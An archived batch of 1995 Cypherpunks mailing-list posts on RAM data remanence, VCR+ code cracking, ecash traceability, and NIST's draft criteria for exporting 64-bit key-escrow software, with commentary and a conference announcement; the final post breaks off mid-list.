From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cg@bofh.lake.de (Cees de Groot)
Date: Tue, 5 Sep 95 02:37:38 PDT
To: monty.harder@famend.com
Subject: Re: maximizing cryptographic return
In-Reply-To: <8B072A1.00030003E8.uuout@famend.com>
Message-ID: <m0spu0n-000PZnC@bofh.lake.de>
MIME-Version: 1.0
Content-Type: application/x-pgp-message

application/pgp-message


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Tue, 5 Sep 95 09:45:12 PDT
To: hallam@w3.org
Subject: Re: Emergency File Wipe Algorithim
Message-ID: <9509051644.AA00586@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


Peter Gutmann writes in an article quoted by Christian Wettergren
>  The greater the amount of time that new data has existed in the
>  cell, the more the old stress is "diluted", and the less reliable
>  the information extraction will be.  Generally, the rates of change
>  due to stress and relaxation are in the same order of magnitude.
>  Thus, a few microseconds of storing the opposite data to the
   ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ 	
>  currently stored value will have little effect on the oxide.
   ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ 	

Phill Hallam writes:
>  If the power is cycled as opposed to turned off only then a memory
>  self test program will probably erase the data.

Assuming Peter Gutmann is correct, a memory test program "probably" won't do much.

Of course, you data must be worth quite a pretty penny for an attacker to  
attempt to recover data from the oxides on the cells in your RAM.


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Tue, 5 Sep 95 02:54:36 PDT
To: mail2news@utopia.hacktic.nl
Subject: Re: SUMMARY: Not-so-volatile volatile memoryRe: SUMMARY: Not-so-volatile volatile memory
Message-ID: <199509050954.LAA15934@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



> -- Summary: Data retention in semiconductor memory --
> 
> Contrary to conventional wisdom, "volatile" semiconductor memory
> does not entirely lose its contents when power is removed.  Both
> static (SRAM) and dynamic (DRAM) memory retain some information on
> the data stored in it while power was still applied.  SRAM is
> particularly susceptible to this problem, as storing the same data
> in it over a long period of time has the effect of altering the
> preferred power-up state to the state which was stored when power
> was removed.  Older SRAM chips could often "remember" the previously
> held state for several days.  In fact, it is possible to manufacture
> SRAM's which always have a certain state on power-up, but which can
> be overwritten later on - a kind of "writeable ROM".

Is this a new discovery?  When I used to work with DOD classified
data, not so long ago, disk drives had to be declassified using an
approved program, such as Norton Utilities' "WIPEINFO".  (That was
approved up through the SECRET/SAR level, anyway.  I don't know
about TS/SCI/SI.)  But those same regulations said that RAM was
considered declassified within a certain time (30 seconds, I think)
after power was removed.  (That time figure was UNclassified, BTW.)
I think it was just to allow time for the voltage to bleed off of
the power supply's filter capacitors, and not related to the
relative volatility of DRAM.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Lane <blane@eskimo.com>
Date: Tue, 5 Sep 95 12:07:37 PDT
To: Peter Trei <trei@process.com>
Subject: Re: VCRPLUS Huffman code
In-Reply-To: <9509051435.AA15596@toad.com>
Message-ID: <Pine.SUN.3.91.950905120136.15689A-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 5 Sep 1995, Peter Trei wrote:

> 
> > Has anyone worked out the VCRPLUS code?
> 

  <chomp>

> Code which implemented this partial crack was published on the net,
> and the VCR+ people got very upset about it - apparently they make

  I believe the code is in the cookbook archive at ftp.ee.ualberta.ca, 
but when I just tried to confirm I got timeouts.

   Brian

------------------------------------------------------------------------------
 ftp.eskimo.com/blane     |                       |     www.eskimo.com/~blane
------------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Fred Sammet <wec@dallas.net>
Date: Tue, 5 Sep 1995 12:17:54 -0500
To: Jonathan Allen <jonathan@mirror.demon.co.uk>
Subject: Re: response (fwd)
Message-ID: <2989ce0b6683a4c535b5c428f0e0275e@NO-ID-FOUND.mhonarc.org>
MIME-Version: 1.0
Content-Type: text/plain


    [The following text is in the "iso-8859-1" character set]
    [Your display is set for the "US-ASCII" character set]
    [Some characters may be displayed incorrectly]


>> What we need is for Fred to send to you a copy of the 
>> program in electronic form (I'm waiting for the too -- then I can 
>> highlight the important sessions for you.


ANNOUNCING:


The Second Annual . . .


	WORLDWIDE ELECTRONIC COMMERCE
	Law, Policy, Security &
	Controls Conference


   October 18-20, 1995
   At the Hyatt Regency Bethesda


   Phone: (214) 516-4900


The Second Annual WorldWide Electronic Commerce; Law, Policy,
Security and Controls conference is fast approaching. This
important event will feature the world's foremost experts
addressing the most important issues of implementation and
control related to secure electronic commerce. It will
focus on current problems and provide a foundation for dealing
with the emerging problems that promise to make the future
more complex. We have been fortunate in securing a faculty
that is unusually qualified and internationally recognized
who will share their experience, knowledge and theories on
the wide range of issues being addressed by this program.
We are equally pleased to have obtained affiliation for
this conference of a number of prestigious and influentual
organizations.

Please join us and your colleagues at this unique event!

   Michael S. Baum, J.D., M.B.A. Conference Chair



Provided in Affiliation with:
=============================================
* American Bar Association
  Section of Science and Technology
  Information Security Committee

* University of London
  Queen Mary & Westfield College
  Centre for Commercial Law Studies

* EDI Association of the United Kingdom

* Harvard Law School

* Internation Union of Latin Notaries

* International Chamber of Commerce, Paris

* National Institute of Standards and Technology (NIST)

* Software Publishers Association

* United Nations
  Commission on International Trade Law (UNCITRAL)

* U.S. Council of International Business
=============================================


Keynote Speaker:
----------------
   Dr. Vinton G. Cerf, Ph.D.
   Senior Vice President
   MCI Telecommunications Corp.



CONFERENCE PROGRAM ...at a glance

  GENERAL SCHEDULE
  -------------------------------------------------
    Wednesday, October 19, 1995  6:00pm - 7:30pm
    SECURE ELECTRONIC COMMERCE FOR THE BEGINNER

    Thursday, October 20, 1995
      8:00am - 9:00am	Welcome & Keynote Speech
      9:00am - 5:50pm	Sessions 1 - 5

    Friday, October 21, 1995
      8:00am - 4:50pm	Sessions 6 - 10


----------------------------------------------
TRACK - A
AGREEMENTS, LEGISLATION, POLICY AND REGULATION
----------------------------------------------
Session 1
So Who's in Charge, Anyway?
The Impact of National & Int'l Leadership & Initiatives in Secure EC
   SPEAKERS:
     Harold S Burman, Esq., Office of the Legal Advisor
     Sally  Katzen, Office of Management and Budget
     Bruce  McConnell, Office of Management & Budget
     Renaud  Sorieul, Esq., UNCITRAL

Session 2
Drafting Agreements for Secure Electronic Commerce
   SPEAKERS:
     Michael S Baum, Esq., Independent Monitoring
     Thomas J Smedinghoff, Esq., McBride Baker & Coles
     Joe  Wackerman, Esq., United States Postal Service

Session 3
Are Privacy Requirements Inhibiting Electronic Commerce?
   SPEAKERS:
     Kenneth C Bass III, Esq., Venable, Baetjer, Howard & Civiletti
     Prof. George  Trubow, The John Marshall Law School
     Ian  Walden, Ph.D., Commission of the European Communities

Session 4
Alternative Methods of Signing:
Legal Aspects of the IRS's July 1995 Regulation
   SPEAKERS:
     Tom  Baker, Esq.,Internal Revenue Service
     Lynn  Casimir, Esq., Internal Revenue Service
     Celia  Gabrysh, Esq., Internal Revenue Service

Session 5
Digital Signature Legislation and Electronic Commerce
   SPEAKERS:
     Alan  Asay, Esq., Utah Department of Commerce
     Kirk W Dillard, Esq., State Senator, State of Illinois
     Dean  Sutherland, State Senator, Washinton State
     William E. Wyrough, Jr., J.D., M.B.A., Florida Legislature

Session 6
The Legal Status and Effect of Digital Signatures - Perspectives
   SPEAKERS:
     Prof. Mads  Andersen, University of Copenhagen
     Mario  Miccoli, International Union of Latin Notaries

Session 7
On-Line Registration vs. In-Person Registration:
What Satisfies Business and Legal Requirements?
   SPEAKERS:
     Phillip  Hallam-Baker, Massachusetts Institute of Technology
     Jeff  Treuhaft, Netscape Communications Corporation
     Peter  Williams, Verisign

Session 8
Antitrust in Electronic Commerce:
Shopping, Payments & Certification Authorities
   SPEAKERS:
     Prof. Mads  Andersen, University of Copenhagen
     John  Greanley, Esq., US Department of Justice, Antitrust Division

Session 9
Proving Secure Computer-Based Transactions: Evidence Revisited
   SPEAKERS:
     Margaret A Berger, Brooklyn Law School
     Charles  Nesson, Harvard Law School
     Ian  Walden, Ph.D., Commission of the European Communities

Session 10
Third Party Service Providers & Certification Authorities-Can They 
Successfully Limit their Liabilty
   SPEAKERS:
     Bruce  Hunter, Esq., General Electric Information Services
     Ellen  Kirsh, Esq., America On Line
     Renaud  Sorieul, Esq., UNCITRAL

--------------------
TRACK - B
INFORMATION SECURITY
--------------------
Session 1
Requirements for Implementing Reasonable Security Procedures
   SPEAKERS:
     Robert  Daniels, Esq., U.S. Social Security Administation
     Dain  Gary, Morgan Stanley
     Allan M Shiffman, Terisa Systems, Inc.

Session 2
Information Security Standards: Policy, Coordination & Interoperability
   SPEAKERS:
     Marty  Ferris, US Department of Treasury
     Hoyt  Kesterson II, Bull Worldwide Information Systems
     Peter  Landrock, Ph.D., CRYPTOMATHIC
     David  Solo, Bolt, Beranek and Newman

Session 3
Who's Really on the Other End:
Identification Technologies and Nonrepudiation
   SPEAKERS:
     Benjamin  Miller, Personal Identification News
     John E Siedlarz, IriScan, Inc.
     William  Sweet, National Semiconductor

Session 4
Security and Security Policy in Internet-based Payments Systems
   SPEAKERS:
     Marty  Ferris, US Department of Treasury
     Tim  Jones, Mondex
     Anne  Wallace, US Department of Treasury

Session 5
When You Forget Your PIN or Die: Key Escrow in Secure Electronic Commerce
   SPEAKERS:
     Prof. Michael  Froomkin, University of Miami School of Law
     Jeff  Greiveldinger, US Department of Justice, Criminal Div.
     Frank W Sudia, Bankers Trust Company

Session 6
Comparing Critical Cryptographic Algorithms, Protocols,
and Standards to Enable Secure Electronic Commerce
   SPEAKERS:
     Peter  Landrock, Ph.D., CRYPTOMATHIC
     Ron  Rivest, Massachusetts Institute of Technology
     Miles E Smid, National Institute of Standards & Tech.

Session 7
Export Controls & Transborder Data Flows:
Is Secure Electronic Commerce in Jeopardy?
   SPEAKERS:
     James  Bidzos, RSA Data Security
     Renee H Danckwerth, Export Consultant


Session 8
'Certificates-R-US':
Trust Models and the Developing Secure Information Infrastructure
   SPEAKERS:
     Warwick  Ford, Bell-Northern Research
     Sead  Muftic, COST Computer Security Technologies
     Peter  Williams, Verisign

Session 9
Professional Accreditation and Certification -
The New Frontier in 'Remote Trust'
   SPEAKERS:
     Richard C Koenig, Int'l Info. Sys. Security Cert. Consort.
     Alan M Schwartz, Esq., American Bar Association

Session 10
Looking into the Crystal Ball: Certificates Revisited
   SPEAKERS:
     Web  Augustine, VeriSign, Inc.
     Warwick  Ford, Bell-Northern Research
     Hoyt  Kesterson II, Bull Worldwide Information Systems

-------------------------------------------
TRACK - C
LEGAL ASPECTS OF SECURE ELECTRONIC COMMERCE
-------------------------------------------
Session 1
Do Criminal Laws Really Protect Electronic Commerce?
   SPEAKERS:
     Scott  Charney, Esq., US Department of Justice
     William J Cook, Brinks, et al.
     Richard A Ress, Federal Bureau of Investigation

Session 2
Who Owns the Information, Standards, Certificates and Cryptographic Keys?
   SPEAKERS:
     Peter  Harter, National Public Telecomputing Network
     David W Maher, Esq., Sonnenschein Nath & Rosenthal
     James  Powers, Esq., Shulman, Rogers et. al

Session 3
Consumers on the Net - Fairness, Conspicuousness, Notice, and Reliance
   SPEAKERS:
     Nessa Eileen Feddis, Esq., Government Relations/Retail Banking
     Ray  Nimmer, Esq., Weil, Gotshal & Manges

Session 4
Electronic Licensing and Distribution of Digital Content:
Downloading for Liability?
   SPEAKERS:
     James C McKay, Jr., Office of the Corporation Counsel, D.C.
     Thomas J Smedinghoff, Esq., McBride Baker & Coles
     Mark  Traphagen, Software Publishers Association.

Session 5
Insuring Electronic Commerce Transactions and Infrastructure
   SPEAKERS:
     Andrew  Cockrane, Alexander & Alexander
     Norman R Nelson, New York Clearing House Association

Session 6
Auditing a Third Party/Value Added Network or
Certification Authority (and Its Implications)
   SPEAKERS:
     Charles H LeGrand, CIA, Institute of Internal Auditors
     John  Stelzer, COMMERCE:Institute

Session 7
Electronic Recordkeeping -
What to Save, When and How to Save It, and for How Long
   SPEAKERS:
     Lynn  Casimir, Esq., Internal Revenue Service
     Celia  Gabrysh, Esq., Internal Revenue Service
     Claude  Perreault, Chambre des notaires du Quebec

Session 8
Disaster and Contingency Planning Services: What is Needed for EC and 
Certification Authorities
   SPEAKERS:
     Dain Gary, Morgan Stanley
     Ake Nilson, Marinade Limited
     Helena  Roine-Taylor, The Finnish Data Communication Assoc. FINPRO
     David Solo, Bolt, Beranek and Newman

Session 9
General Counsel's Forum on Computer-Based Trade
   SPEAKERS:
     Robert W Barger, Esq., AT&T
     Bruce  Hunter, Esq., General Electric Information Services
     Ellen  Kirsh, Esq., America On Line

Session 10
An Audit Model for Your Electronic Commerce Infrastructure
   SPEAKERS:
     Gerald R Bielfeldt, NationsBank
     Phillip  Oddo, Ciba-Geigy
     Horton  Sorkin, Ph.D., Howard University


------------------------------
TRACK - D
INFRASTRUCTURAL CONSIDERATIONS
------------------------------
Session 1
Securely Shopping on the Web: New Paradigms, Protocols and Opportunities
   SPEAKERS:
     Jeff Hilt, VISA International
     Todd Ostrander, Egghead Software

Session 2
What can Trusted Third Parties and Certification
Authorities Learn from the Financial Clearinghouses
   SPEAKERS:
     Carol  Barrett, Federal Reserve Bank of New York
     Bill  Nelson, National Automated Clearinghouse Associa
     Norman R Nelson, New York Clearing House Association

Session 3
Electronically 'Gluing' Computer-based Records
   SPEAKERS:
     Phillip  Hallam-Baker, Massachusetts Institute of Technology
     Allan M Shiffman, Terisa Systems, Inc.

Session 4
Global Registries for Secure Electronic Commerce
   SPEAKERS:
     Jonathan Allen, Barum Computer Consultants
     Michel Peereman, Federation Nationale des Chambres
     Peter Robinson, US Council for International Business

Session 5
Computer-based Negotiability: What is Needed to Make it Work
   SPEAKERS:
     Harold S Burman, Esq., Office of the Legal Advisor
     James E Byrne, James Mason University Law School
     Ake Nilson, Marinade Limited

Session 6
Time/Date Stamping of Digital Information: Necessities & Options
   SPEAKERS:
     Richard  Rothwell, United States Postal Service
     Scott  Stornetta, Surety Technologies, Inc.

Session 7
Will Healthcare-related Electronic Commerce
Require Special Controls and Secure Infrastructures?
   SPEAKERS:
     Kathleen  Frawley, J.D., M.S., R.R.A, AHIMA
     Daniel J O'Shea, National Computer Claims Service

Session 8
The Role of Notaries in Securing Computer-Based Commerce: the CyberNotary(sm)
   SPEAKERS:
     Theodore S Barassi, Esq., US Council for International Business
     Mario Miccoli, International Union of Latin Notaries

Session 9
Electronic Cash and Novel Electronic Commerce Payments Systems
   SPEAKERS:
     Nessa Eileen Feddis, Esq., Government Relations/Retail Banking
     Ron Rivest, Massachusetts Institute of Technology
     Marvin Sirbu, Carnegie-Mellon University

Session 10
Why does Everyone Want to be a Trusted Third
Party/Certification Authority (at Least Initially)?
   SPEAKERS:
     Sead  Muftic, COST Computer Security Technologies
     Stratton D Sclavos, VeriSign, Inc.


-----------------------------------------------------------------
TO REGISTER:
-------------

Price: $550.00 (U.S.)

Name:
Title:
First Name for Badge:
Company/Organization:
Address:
City/State/Prov/Zip/Postal code:
Country:
Telephone:
Fax:
E-Mail:

Check One:
==========
[ ] I am Mailing a check in the amount of $______
[ ] I wish to charge this to a credit card (fax or mail only)
     [ ] American Express
     [ ] Visa
     [ ] MasterCard

     Card Number:
     Expiration Date:
     Name on Card:
     Signature (fax or mail):

-----------------------------------------------------------------
HOTEL RESERVATIONS:
	A special conference rate of $129 has been arranged
	for our attendees. To make arrangements, please call
	the Hyatt Regency Bethesda at (301) 657-1234

	Hyatt Regency Bethesda
	One Bethesda Metro Center
	Bethesda, MD 20814
-----------------------------------------------------------------

For more information or a complete program brochure and schedule,
contact the conference coordinators as shown below:


HOW TO CONTACT US
=================
E-Mail:  wec@multicorp.com
Phone: (214) 516-4900
Fax: (214) 424-0562

Mail: Worldwide Electronic Commerce
      PO Box 743485
      Dallas, TX 75374

===============================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Neal <dneal@usis.com>
Date: Tue, 5 Sep 95 10:43:21 PDT
To: cypherpunks@toad.com
Subject: A recent article on Electronic Commerce
Message-ID: <Pine.BSI.3.91.950905121250.3370A-100000@usis.com>
MIME-Version: 1.0
Content-Type: text/plain




In the August 28, 1995 issue of Communications Week, the editor
Mitch Irsfield briefly discusses electronic checking, and the
joint venture between Sun, BBN, IBM, et al.  He also references
an article explaining the venture on Page 5 of the same issue.

I dropped him a quick note thanking him for writing a non-hysterical
article on cryptography, and also briefly mentioned that some
of us would prefer electronic cash to electronic checking.  

Since part of being a cypherpunk is political, I'd like to encourage
everyone to write a quick e-mail which expresses your own views 
to Mr. Irsfield (678-7017@mcimail.com).  Speaking of talking to
the 'public' about crypto-cash, we really need a meme of our own.
Just as The Other Side invokes the specters of terrorism and
child pornography, we need something like 'traceable transactions',
'government approved checking', 'uncle sam's clearing house', or
'irs approved bill payments.'  Obviously the creative types on
the list can come up with much better.   But, I digress.

The Page 5 article doesn't go into much detail, but says in essence
that the system is an api layer and a smart card.  In the cases
of larger corporations, they may require a seperate processor.
This says 'encryption in hardware' to me.  Gee, wonder if someone
found a use for all those useless tessera cards after all? :-)



David Neal <dneal@usis.com> - GNU Planet Aerospace 1-800-PLN-8-GNU
Unix, Sybase and Networking consultant. "...you have a personal responsibility 
to be pro-active in the defense of your own civil liberties." - S. McCandlish





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 5 Sep 95 12:41:48 PDT
To: Bill Stewart <pfarrell@netcom.com
Subject: Re: Acceptable NIS&T restrictions
Message-ID: <v02120d02ac725e647251@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 17:20 9/4/95, Bill Stewart wrote:
[...]

>For Commercial Key Escrow, or commercial key-backup services, the criteria are
>"whoever can be trusted to provide the services the customers want".
>In this case, of course, the service most customers want is to be left alone,
>or, failing that, to have the government's Master Key system provide minimal
>risk
>to the security of the actual transactions - 64 bit keys are not enough
>security
>for any high-valued financial transactions, though they may suffice for
>credit cards.
>One required characteristic would appear to be either sufficiently deep pockets
>to collect judgements for violations of trust or a sufficiently high
>reputation that
>violations of trust are not expected.

I seems obvious to me that prospective key escrow agents would be exempt
from all liability for damages caused by releasing a key, exept in cases of
gross negligence. Gross negligence being defined as giving a key to a
person who explicitly states that they intend to use it for illegal
purposes.

-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 5 Sep 95 12:43:09 PDT
To: Black Unicorn <cypherpunks@toad.com
Subject: Re: Forgery, bills, and the Four Horsemen  (Articles and Comment)
Message-ID: <v02120d03ac7260cb02e3@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 23:44 9/4/95, Black Unicorn wrote:
[...]

>3.  The corruption of e-cash to further the above.
>
>If the government is disturbed by the laundering of money enough
>to actually print, or even propose printing, two kinds of
>currency, how will they respond to untraceable, unaccountable and
>infinitely liquid e-cash?  I think the answer is in past behavior:
>e-cash will be linked to the four horsemen and subjected to
>rigorous reporting requirements- systems which are true e-cash
>will be banned.

This is unnecessary, since there is no "true" ecash. DigiCash's ecash in
its current form, the only version David Chaum is willing to licenese, is
fully traceable. Popular Cypherpunk's myths nonwithstanding.

First, the recipient of funds is non-anonymous by design. Second, any payer
can trivialy make the recipient of a ecash note known by revealing the
blinding factor. For purposed of lawenforcement, DigiCash's ecash in no
more secure than if the (insert horseman here) billed his fees to a credit
card.


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 5 Sep 95 13:38:05 PDT
To: Andrew Loewenstern <hallam@w3.org
Subject: Re: Emergency File Wipe Algorithim
Message-ID: <v02120d05ac7269b71b65@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:44 9/5/95, Andrew Loewenstern wrote:

>Of course, you data must be worth quite a pretty penny for an attacker to
>attempt to recover data from the oxides on the cells in your RAM.

Didn't I just read a day ago that Robert Morris (ex-NSA) cautioned that one
should never underestimate the time and effort an opponent is willing to
put into recovering your data?

May I also point out that the rules of economics do not apply to the
federal government, since it insits - quite successfully - on having a
monoploy on using lethal force to extract arbitraily large amounts from
hundreds of millions of working Americans?

-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@rand.org>
Date: Tue, 5 Sep 95 13:54:02 PDT
To: cypherpunks@toad.com
Subject: Another Son of Clipper discussion paper
Message-ID: <199509052053.NAA01226@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain


I sent along two discussion papers for tomorrow's NIST session on the
revised plans for GAK last week.  Here's the third.

	Jim Gillogly
	Hevensday, 14 Halimath S.R. 1995, 20:49
-----------------------------------------------------------------------------

Key Escrow Issues Meeting, September 6-7, 1995
Discussion Paper #3

                 Export Criteria Discussion Draft --
                64-bit Software Key Escrow Encryption

As discussed at the SPA/AEA meeting on August 17, 1995, the
Administration is willing to allow the export of software
encryption provided that the products use algorithms with key
space that does not exceed 64 bits and the key(s) required to
decrypt messages/files are escrowed with approved escrow agents.
On the same date, the September 6-7 key escrow issues meeting at
NIST was also announced.  The two principal topics at the meeting
will be:  discussion of issues of exportability of 64-bit
software key escrow encryption and 2) desirable characteristics
for key escrow agents.

In order to help make most productive use of the limited time
available at the upcoming meeting and to better focus
deliberation, the following criteria are being distributed for
discussion purposes.  Since it is important that final criteria
be clear, straightforward, consistent, and implementable, please
review these draft criteria and be prepared to discuss
how they may be refined and made more specific.

                          --- Draft Export Criteria ---
for Software Key Escrow Encryption

Software key escrow encryption products meeting the following
criteria will be granted special export licensing treatment
similar to that afforded other mass-market software products with
encryption.

1.    The product will use an unclassified encryption algorithm
      (e.g., DES, RC4) with a key length not to exceed 64 bits.

2.    The product shall be designed to prevent multiple encryption
      (e.g., triple-DES).

3.    The key required to decrypt each message or file shall be
      accessible through a key escrow mechanism in the product,
      and such keys will be escrowed during manufacture in
      accordance with #10.  If such keys are not escrowed during
      manufacture, the product shall be inoperable until the key
      is escrowed in accordance with #10.

4.    The key escrow mechanism shall be designed to include with
      each encrypted message or file, in a format accessible by
      authorized entities, the identity of the key escrow
      agent(s), and information sufficient for the escrow agent(s)
      to identify the key or key components required to decrypt
      that message.

5.    The product shall be resistant to any alteration that would
      disable or circumvent the key escrow mechanism, to include
      being designed so that the key escrow mechanism cannot be
      disabled by a static patch, (i.e., the replacement of a
      block of code by a modified block).

6.    The product shall not decrypt messages or files encrypted by
      non-escrowed products, including products whose key escrow
      mechanisms have been altered or disabled.

7.    The key escrow mechanism allows access to a user's encrypted
      information regardless of whether that user is the sender or
      the intended recipient of the encrypted information.

8.    The key escrow mechanism shall not require repeated
      involvement by the escrow agents for the recovery of
      multiple decryption keys during the period of authorized
      access.

9.    In the event any such product is or may be available in the
      United States, each production copy of the software shall
      either have a unique key required for decrypting messages or
      files that is escrowed in accordance with #10, or have the
      capability for its escrow mechanism to be rekeyed and any
      new key to be escrowed in accordance with #10.

10.   The product shall accept escrow of its key(s) only with
      escrow agents certified by the U.S. Government or by foreign
      governments with which the U.S. Government has formal
      agreements consistent with U.S. law enforcement and national
      security requirements.

Note: Software products incorporating additional encryption
methods other than key escrow encryption methods will be
evaluated for export on the basis of each encryption method
included, as is already the case with existing products.
Accordingly, these criteria apply only to the key escrow
encryption method incorporated by a software product, and not to
other non-escrowed encryption methods it may incorporate.  For
instance, non-escrowed encryption using a key length of 40 bits
or less will continue to be exportable under existing export
regulations.
                                - - -
Please also review discussion paper #1 (distributed earlier),
which raises a number of issues involving exportability criteria
and how exportable products could be designed.  Discussion paper
#2 (also previously distributed) presents questions involving key
escrow agents.

Note:  These issues will be discussed at the Key Escrow Issues
Meeting to be held September 6-7, 1995 (9:00 a.m. - 5:00 p.m.) at
the National Institute of Standards and Technology (Gaithersburg,
Maryland).  The meeting will be open to the public, although
seating is limited.  Advance registration is requested, please
contact Arlene Carlton on 301/975-3240, fax: 301/948-1784 or e-
mail: carlton@micf.nist.gov.

9/1/95
-----------------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Tue, 5 Sep 95 13:57:43 PDT
To: cypherpunks@toad.com
Subject: approx of bignum^rational
Message-ID: <v02120d01ac7277823b9e@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



Does anyone have a good method for approximating bignums raised
rational exponents in the interval [0,1]?

Thanks,

Douglas Barnes
Electric Communities






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dr261@cleveland.Freenet.Edu (Tobin T Fricke)
Date: Tue, 5 Sep 95 11:22:45 PDT
To: cypherpunks@toad.com
Subject: [trei@process.com:       Re: VCRPLUS Huffman code]
Message-ID: <199509051806.OAA03038@kanga.INS.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


    ================= Begin forwarded message =================

    From: trei@process.com (Peter Trei)
    To: miniters@citadel.edu, cypherpunks@toad.com
    Subject:       Re: VCRPLUS Huffman code
    Date: Tue, 05 Sep

    
    
    > Has anyone worked out the VCRPLUS code?
    
    It was partially broken a few years ago, and the results published in
    Cryptologia. I have a xerox in a carton somewhere. 
    
    The break was for codes up to 4or 5 digits long, if I recall - this covers
    most of the major timeslots on the main stations. Longer codes
    cover odd timeslots on less popular stations.
    
    Code which implemented this partial crack was published on the net,
    and the VCR+ people got very upset about it - apparently they make
    money selling the codes to TV Guide and newspapers. It's protected
    as a trade secret, not a patent.
    
    It used a combination of lookup tables and Huffman codes, and
    included a certain amount of obfuscation to resist cracking.
    
    Peter
    
    
    Peter Trei
    Senior Software Engineer
    Purveyor Development Team                                
    Process Software Corporation
    http://www.process.com
    trei@process.com
    
    

--
Tobin Fricke (aka LightRay)       The Digital Forest BBS (714)586-6142
dr261@kanga.ins.cwru.edu          KE6WHF Amateur Radio, 1:103/925 fido




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@omni.voicenet.com>
Date: Tue, 5 Sep 95 11:11:08 PDT
To: cypherpunks@toad.com
Subject: Re: VCRPLUS Huffman code
In-Reply-To: <199509042328.TAA02676@nic.wat.hookup.net>
Message-ID: <Pine.LNX.3.91.950905140509.281A-100000@localhost>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 4 Sep 1995 bplib@nic.wat.hookup.net wrote:

> I too would be interested in the VCRPlus code. Has anyone broken it?
> Tim Philp
> 
> 
> 

You can get the source code to VCR+ encoding and decoding at
ftp://sable.ox.ac.uk/pub/crypto/cryptanalysis/vcr+.shar.gz





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 5 Sep 95 14:48:13 PDT
To: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Subject: Re: Emergency File Wipe Algorithim
Message-ID: <v02120d04ac7283767710@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 16:20 9/5/95, Andrew Loewenstern wrote:
[...]
>andrew
>(wonders how many readers will take their keyboards apart to look for radio
>transmitters)

Been there. Done that. Hmm, come to think of it, it's about time for
another check.


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Tue, 5 Sep 95 11:53:33 PDT
To: cypherpunks@toad.com
Subject: Re: SSL trouble
Message-ID: <9509051853.AA21783@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> >I did a distributed scheme for something else that had two levels, a master
> >and a group of slaves.  Only the slaves talked to the master.  For this 
> >effort I think a variation of the idea would be better.  Have all of the
> >brutes contact the master, who will, in the first transaction assign them
> >to the next slave in a round-robin fashion.

> Why not just have the brutes pick a slave at random?  Of course, you need
> to give them a complete list of slaves to choose from.  But then the only
> difference between the master and the slaves will be that the master
> doesn't get any keyspace (it's got it all to begin with) and doesn't
> report any results upward.

This is starting to sound like alt.sex.bondage....


Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
http://www.process.com
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@rand.org>
Date: Tue, 5 Sep 95 15:04:59 PDT
To: cypherpunks@toad.com
Subject: Son of Clipper (commentary)
Message-ID: <199509052204.PAA01423@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain


I didn't want to mix my comments with the recent discussion paper I sent
along, so here they are separately.  Please refer back to my last msg to
see the points I'm bitching about.

It's a depressingly restrictive list of things to require for software
escrow encryption.  I can only conclude that they're not serious.  Clipper
itself fails to meet many of them, including (I think) #1, #2, #5, and #6.
Rumor has it that Clipper does not meet #9 either -- at Crypto '95
somebody in the Key Escrow session said many government Clipper keys are
not escrowed, and somebody in the back spoke up and said he owned such a
chip.  By the way, Moti Yung (noted crypto guy at IBM Yorktown Heights)
presented more breaks in Clipper's protocols like those Matt Blaze found,
and pointed out some aspects of Matt's break that he thinks make it more
important than previously thought.

Other things that bother me about the list:

#1: If it's escrowed, there should be no need to limit the key length unless
    somebody's planning to cheat.

